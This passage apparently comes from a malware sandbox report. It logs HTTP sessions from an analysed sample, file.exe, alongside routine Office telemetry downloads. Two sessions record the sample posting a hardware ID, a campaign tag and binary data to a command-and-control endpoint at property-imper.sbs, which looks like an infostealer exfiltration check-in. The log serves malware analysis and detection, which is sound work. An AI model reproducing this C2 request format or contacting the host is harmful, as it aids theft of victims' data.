                                                                                                                                                                        2024-11-24 04:11:28 UTC15331OUTData Raw: 2d 2d 45 53 59 4b 55 30 30 4e 44 46 49 38 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 41 46 45 44 38 41 38 43 46 38 42 41 44 34 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 45 53 59 4b 55 30 30 4e 44 46 49 38 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 53 59 4b 55 30 30 4e 44 46 49 38 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 45 53 59 4b 55
                                                                                                                                                                        Data Ascii: --ESYKU00NDFI8YContent-Disposition: form-data; name="hwid"95AFED8A8CF8BAD4D7CBBD6DF28D3732--ESYKU00NDFI8YContent-Disposition: form-data; name="pid"3--ESYKU00NDFI8YContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--ESYKU
                                                                                                                                                                        2024-11-24 04:11:28 UTC5046OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                                                                                                                        2024-11-24 04:11:29 UTC1019INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:29 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=0ldohqgn23v1ogqnj1g609psiu; expires=Wed, 19-Mar-2025 21:58:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0NOWLciaxz2xo956b%2BQj2p4ht8sSQilA1PzuJ3uULPEev%2BZyVCG6oi7R0EZ042Q1z7bMaKw6osyY89gO5JLLgVSJg0%2B2VsIUH2zv%2FONkYVIqzQZatD57cdX29Ohvg8SK82Fee0I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8e768e208e8a7286-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1874&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21336&delivery_rate=1586956&cwnd=240&unsent_bytes=0&cid=9e4175ae540c88c6&ts=911&x=0"
                                                                                                                                                                        2024-11-24 04:11:29 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                        Data Ascii: eok 8.46.123.75
                                                                                                                                                                        2024-11-24 04:11:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        21192.168.2.74972413.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:30 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:30 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 469
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                        ETag: "0x8DC582BBA701121"
                                                                                                                                                                        x-ms-request-id: 63e0f5a8-701e-0032-207a-3ba540000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041130Z-174c587ffdfcb7qhhC1TEB3x7000000003wg00000000nh3v
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:30 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        22192.168.2.74972513.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:30 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:30 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                        ETag: "0x8DC582BA41997E3"
                                                                                                                                                                        x-ms-request-id: 9bf3f441-f01e-003f-246b-3bd19d000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041130Z-178bfbc474bnwsh4hC1NYC2ubs00000005m0000000002nzc
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:30 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        23192.168.2.74972613.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:30 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:30 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                        ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                        x-ms-request-id: f380030e-501e-007b-0625-3d5ba2000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041130Z-178bfbc474bv587zhC1NYCny5w00000005ag0000000084k9
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:30 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        24192.168.2.74972713.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:30 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:30 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 464
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                        ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                        x-ms-request-id: 918e3103-701e-0097-4a7c-3bb8c1000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041130Z-174c587ffdf7t49mhC1TEB4qbg00000003qg00000000r3h5
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:30 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        25192.168.2.74972813.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:30 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:31 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:30 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 494
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                        ETag: "0x8DC582BB7010D66"
                                                                                                                                                                        x-ms-request-id: f1d8b84e-f01e-0096-7de6-3d10ef000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041130Z-178bfbc474bpnd5vhC1NYC4vr400000005bg00000000f21p
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:31 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        26192.168.2.749729104.21.33.1164437416C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:31 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=8Y9LCPICK9U
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 1184
                                                                                                                                                                        Host: property-imper.sbs
                                                                                                                                                                        2024-11-24 04:11:31 UTC1184OUTData Raw: 2d 2d 38 59 39 4c 43 50 49 43 4b 39 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 41 46 45 44 38 41 38 43 46 38 42 41 44 34 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 38 59 39 4c 43 50 49 43 4b 39 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 59 39 4c 43 50 49 43 4b 39 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 38 59 39 4c 43 50 49 43 4b 39 55
                                                                                                                                                                        Data Ascii: --8Y9LCPICK9UContent-Disposition: form-data; name="hwid"95AFED8A8CF8BAD4D7CBBD6DF28D3732--8Y9LCPICK9UContent-Disposition: form-data; name="pid"1--8Y9LCPICK9UContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--8Y9LCPICK9U
                                                                                                                                                                        2024-11-24 04:11:31 UTC1020INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:31 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=1lhhjf253su6ao87g6blfok0b9; expires=Wed, 19-Mar-2025 21:58:10 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cOrBRLMwuzjRDNX4vwaa6feH3%2FFrGWXijPphI%2BobBfm3z7WpOf%2FLJwmlXtW%2BGwIVenlkmvpYUVk41hP%2FT%2FycW16vd4K2ooPEjiLLpcQaY4VBgxurEq84BdHry81S1V49ALqGJBU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8e768e306e327c94-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1830&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2096&delivery_rate=1575822&cwnd=234&unsent_bytes=0&cid=8314a3a8649e73c2&ts=710&x=0"
                                                                                                                                                                        2024-11-24 04:11:31 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                        Data Ascii: eok 8.46.123.75
                                                                                                                                                                        2024-11-24 04:11:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        27192.168.2.74973113.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:32 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:32 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:32 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                        ETag: "0x8DC582B9748630E"
                                                                                                                                                                        x-ms-request-id: c28a24b9-601e-0097-1e86-3df33a000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041132Z-15b8b599d88hd9g7hC1TEBp75c00000003v000000000crep
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:32 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        28192.168.2.74973313.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:32 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:32 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 404
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                        ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                        x-ms-request-id: 0be92aa4-301e-006e-24ea-3df018000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041132Z-178bfbc474brk967hC1NYCfu6000000005a000000000344m
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
